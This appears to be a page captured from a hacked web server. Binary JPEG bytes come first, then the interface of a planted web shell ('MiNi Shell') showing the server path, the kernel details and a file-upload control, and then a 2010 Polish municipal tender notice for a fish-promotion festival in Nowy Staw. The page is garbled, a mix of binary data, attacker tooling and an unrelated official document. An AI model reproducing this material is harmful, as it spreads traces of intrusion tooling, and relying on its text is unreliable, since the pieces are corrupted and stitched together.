JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100908/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100908/283398-N-2010.html

<p class="kh_header"><b>Nowy Staw: Kompleksowa organizacja kampanii promocyjnej ryb i produktów rybnych w gminie Nowy Staw pt. Zdrowy jak ryba.</b><br>
<b>Numer ogłoszenia: 283398 - 2010; data zamieszczenia: 08.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Nowy Staw , ul. Bema 1, 82-230 Nowy Staw, woj. pomorskie, tel. 055 2715110.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.nowystaw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kompleksowa organizacja kampanii promocyjnej ryb i produktów rybnych w gminie Nowy Staw pt. Zdrowy jak ryba..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest kompleksowa organizacja kampanii promocyjnej ryb i produktów rybnych pt Zdrowy jak ryba dnia 26 września 2010 roku w gminie Nowy Staw w ramach Programu Operacyjnego Zrównoważony rozwój sektora rybołóstwa i nadbrzeżnych obszarów rybackich 2007-2013. Kampania produktów rybnych skierowana jest do różnych grup wiekowych zarówno do dorosłych jak i dzieci oraz młodzieży szkolnej. Jej ogólnym celem jest zachęcenie jak największej liczby osób do zwiększenia spożycia ryb i produktów rybnych, poszerzenie wiedzy na temat walorów odżywczych i zalet potraw rybnych.
Realizacja kampanii składa się z działań standardowych wymaganych przy organizacji imprez plenerowych jak również działań promocyjno - informacyjnych.
Impreza trwać będzie co najmniej 8 godzin.  W ramach działania wymagane jest :
- zamieszczenie informacji o imprezie w prasie lokalne - publikację materiałów informacyjno - promocyjnych w lokalnej prasie przed organizacją imprezy oraz jedno wydanie po.  Ogłoszenie I będzie zawierać hasło przewodnie, datę i miejsce imprezy, logotypy instytucji finansujących oraz informacje o planowanym przebiegu imprezy w tym również krótkie informację na temat walorów odżywczych produktów rybnych. Ogłoszenie II zawierać będzie hasło przewodnie, logotypy instytucji finansujących oraz informacje o przebiegu imprezy oraz krótką informację na temat walorów odżywczych produktów rybnych.
- opracowanie projektu oraz wykonanie banera reklamowego o wymiarach 6 x 1 m. Planuje się powieszenie banera w miejscu widocznym powszechnie dostępnym np. nad drogą Nowy Staw - Malbork przy wjeździe do Nowego Stawu, bądź w innym widocznym miejscu. Baner będzie zawierał hasło przewodnie, datę i miejsce imprezy jak również logotypy instytucji finansujących. Będzie spełniać zarówno rolę informacyjną jak i promocyjną realizowanej kampanii.
- opracowanie projektu i wydruk ulotki promocyjnej A4 składana, kolor, papier kredowy. Planuje się rozpowszechnienie podczas trwania imprezy pięćset sztuk ulotek zawierających krótkie informacje o projekcie wraz z logotypami instytucji finansujących oraz informacje na temat zdrowotnych walorów produktów rybnych, przepisy na potrawy rybne.
- opracowanie projektu i wydruk plakatów informacyjno - promocyjnych: format A2, kolor, papier kredowy. Planuje się wykonanie plakatów w ilości pięćset sztuk, zostaną rozwieszone tydzień przed imprezą na terenie całej Gminy. Plakaty będą zawierały hasło przewodnie, datę i miejsce imprezy, logotypy instytucji finansujących oraz informacje o planowanym przebiegu imprezy jak również krótkie informacje na temat zdrowotnych walorów produktów rybnych.
- wynajem sceny o wymiarach 10 x 8m z zadaszeniem. Scena będzie zagospodarowana przez konfenansjera, który będzie prowadzić festyn, kucharza, na scenie odbywać  się będą konkursy skierowane do uczestników festynu w podziale na grupy wiekowe. 
- zaangażowanie zawodowe kucharza - pokazy przyrządzania produktów rybnych, podczas nich będzie omawiać sposoby przygotowania produktów rybnych do spożycia, a także będzie omawiać ich walory smakowe i zdrowotne. Kucharz będzie prowadził na scenie autorski pokaz przyrządzania różnorodnych potraw z produktów rybnych. 
- zaangażowanie zawodowe konfenansjera - będzie pełnić rolę gospodarza festynu w tym będzie informować uczestników o atrakcjach jakie zostały opracowane i jakie czekają  jeszcze do realizacji. Będzie wspomagać osoby prowadzące konkursy oraz kucharza, urozmaici imprezę dowcipami zapewni profesjonalne przeprowadzenie imprezy. Będzie również informować uczestników festynu o walorach smakowo-odżywczych a tym samym zachęcać do zwiększenia spożycia ryb. 
- zaangażowanie 2 osób prowadzących konkursów i zabaw o tematyce związanej z projektem. Przewidziano trzy konkursy skierowane do dzieci i młodziezy szkolnej. Konkursy skierowane do dzieci i młodzieży szkolnej zostaną ogłoszone już w sierpniu na stronie Beneficjenta natomiast z początkiem roku szkolnego zostaną rozesłane do wszystkich szkół na terenie gminy Nowy Staw. Przewidziano organizację konkursu plastycznego oraz gry i zabawy. Konkursy dla dorosłych z wiedzy na  temat walorów smakowych i zdrowotnych produktów rybnych. 
- wynajem scenografii sceny - scena zostanie udekorowana wynajętą scenografią stosownie do charakteru imprezy (np. sieci i osprzęt rybacki, plansze z rybami, zdjęcia potraw rybnych itp.).
- zakup nagród konkursowych. Zakup nagród związany jest z przeprowadzeniem konkursów dla publiczności, będą one ściśle związane z rybami oraz produktami rybnymi. Dla uczestników konkursów przewidziano drobne nagrody rzeczowe, mające charakter promocyjny w tym promocję produktów rybnych oraz promocję ich spożycia. W ramach nagród przewidziano zakup następujących nagród:
1.książki kucharskie - dania rybne - 20 sztuk,
2.wędki - 20 sztuk, 
3.kołowrotki - 20 sztuk, 
4.torby - 40 szt., 
5.atlas rybny - 20 szt.
- degustacja produktów rybnych wraz z zapewnieniem miejsc do ich spożywania. Festyn będzie połączony z degustacją produktów rybnych, zakłada się dystrybucję wśród uczestników imprezy plenerowej pięciu tysięcy porcji degustatorskich w pięciu  rodzajach potraw rybnych (każda potrawa po 1000 porcji) - zupa rybna, dorsz smażony, makrela z grilla, śledź zapiekany w occie, ryba po grecku. Waga porcji min. 50 gram, będzie podawana w naczyniach jednorazowego użytku do tego sztućce. W ramach tego działania zostanie zapewnione miejsce do spożywanie potraw tj. ławy z parasolami lub namioty.
- wynajem kabin sanitarnych, które zostaną wynajęte na czas trwania imprezy w ilości 4 szt. o normalnym standardzie wyposażenia;
- wynajem śmietników w ilości 7 szt., o pojemności 240 litrów;
- ubezpieczenie OC imprezy, wymóg podyktowany zabezpieczeniem organizatora imprezy przed potencjalnymi roszczeniami osób fizycznych i prawnych; 
- zabezpieczenie imprezy od strony medycznej, koniecznym jest zapewnienie obecności ratownika medycznego przez cały czas trwania imprezy;
- wynajem firmy ochroniarskiej, w celu zapewnienia bezpieczeństwa podczas trwania imprezy. Uwzględniając planowaną liczbę uczestników konieczne jest wynajęcie co najmniej 20 pracowników ochrony. 
- wynajem barierek ochronnych w ilości 120 szt., w celu zapewnienia bezpieczeństwa przy scenie oraz podczas trwania konkursów oraz zabezpieczenia terenu imprezy.  
- usługa zarządzanie projektem oraz rozliczenie kampanii promocyjnej. Beneficejnt zamierza zlecić usługę związaną z kierowaniem projektem oraz rozliczeniem całej kampanii poza jednostę. W obecnej chwili prowadzonych jest pięć projektów inwestycyjnych, kolejny projekt były dużym obciążeniem.  W zakres niniejszego zadania wchodzić będzie kierowanie projektem w tym monitoring zgodności rzeczowej oraz finansowej realizacji działań promocyjno - informacyjnych przez wybranego Wykonawcę, nadzór nad zawieranymi umowami oraz przygotowanie dokumentacji wymaganej do rozliczenia projektu.
- projekt będzie dotyczyć promocji wszystkich dostępnych w sprzedaży gatunków ryb, bez jakichkolwiek preferencji dotyczących ich pochodzenia oraz gatunku.
- podczas realizacji kampanii nie będą eksponowane żadne elementy dotyczące promocji konkretnych marek handlowych związanych z produktami rybnymi. 
- promocja projektu - Wszelkie publikowane materiały (banery, ulotki, plakaty) winny być  przed publikacją uzgodnione z Zamawiającym oraz zawierać informacje o współfinansowaniu projektu ze środków pochodzących z Unii Europejskiej oraz logo UE oraz PO Ryby 2007-2013 
Informacja na temat możliwości powierzenia przez wykonawcę wykonania części lub całości zamówienia podwykonawcom: wykonawca może powierzyć wykonanie części lub całości niniejszego zamówienia podwykonawcom. W takim przypadku zobowiązany jest do wykazania w formularzu ofertowym części zamówienia, której wykonanie zamierza powierzyć podwykonawcom.
1. Wymagania stawiane Wykonawcy:
1.1 Wykonawca jest odpowiedzialny za jakość, zgodność z warunkami technicznymi i jakościowymi opisanymi dla przedmiotu zamówienia. 
1.2 Wymagana jest należyta staranność przy realizacji zobowiązań umowy, 
1.3 Ustalenia i decyzje dotyczące wykonywania zamówienia uzgadniane będą przez zamawiającego z ustanowionym przedstawicielem wykonawcy. 
1.4 Określenie przez Wykonawcę telefonów kontaktowych i numerów fax. oraz innych ustaleń niezbędnych dla sprawnego i terminowego wykonania zamówienia. 
1.5 Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania przedmiotu zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.95.20.00-2, 79.34.22.00-5, 79.34.10.00-6, 79.71.00.00-4, 55.32.10.00-6, 55.32.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 26.09.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający informuje, iż działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek zostanie spełniony, jeżeli wykonawca posiada wiedzę i doświadczenie a w szczególności wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał co najmniej 2 usługi w zakresie przeprowadzenia imprezy degustacyjno-plenerowej na kwotę co najmniej 100.000 brutto każda.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek zostanie spełniony jeżeli Wykonawca posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę minimum - 100 000 ,00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dokumenty potwierdzające posiadanie uprawnień / pełnomocnictw osób składających ofertę, o ile nie wynikają z przepisów prawa lub z przedstawionych dokumentów rejestrowych</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany umowy, w przypadku gdy:
- konieczność wprowadzenia zmian będzie następstwem zmian wytycznych lub zaleceń Instytucji, która przyznała środki na sfinansowanie umowy
- zaistnienia okoliczności leżących po stronie zamawiającego, w szczególności spowodowanych sytuacją finansową, zdolnościami płatniczymi lub warunkami organizacyjnymi lub okolicznościami, które nie były możliwe do przewidzenia w chwili zawarcia umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.nowystaw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski
ul. Gen. J. Bema 1
82-230 Nowy Staw.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.09.2010 godzina 12:00, miejsce: Urząd Miejski
Gen. J. Bema 1
82-230 Nowy Staw
sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiotem zamówienia jest kompleksowa organizacja kampanii promocyjnej ryb i produktów rybnych pt Zdrowy jak ryba dnia 26 września 2010 roku w gminie Nowy Staw w ramach Programu Operacyjnego Zrównoważony rozwój sektora rybołóstwa i nadbrzeżnych obszarów rybackich 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com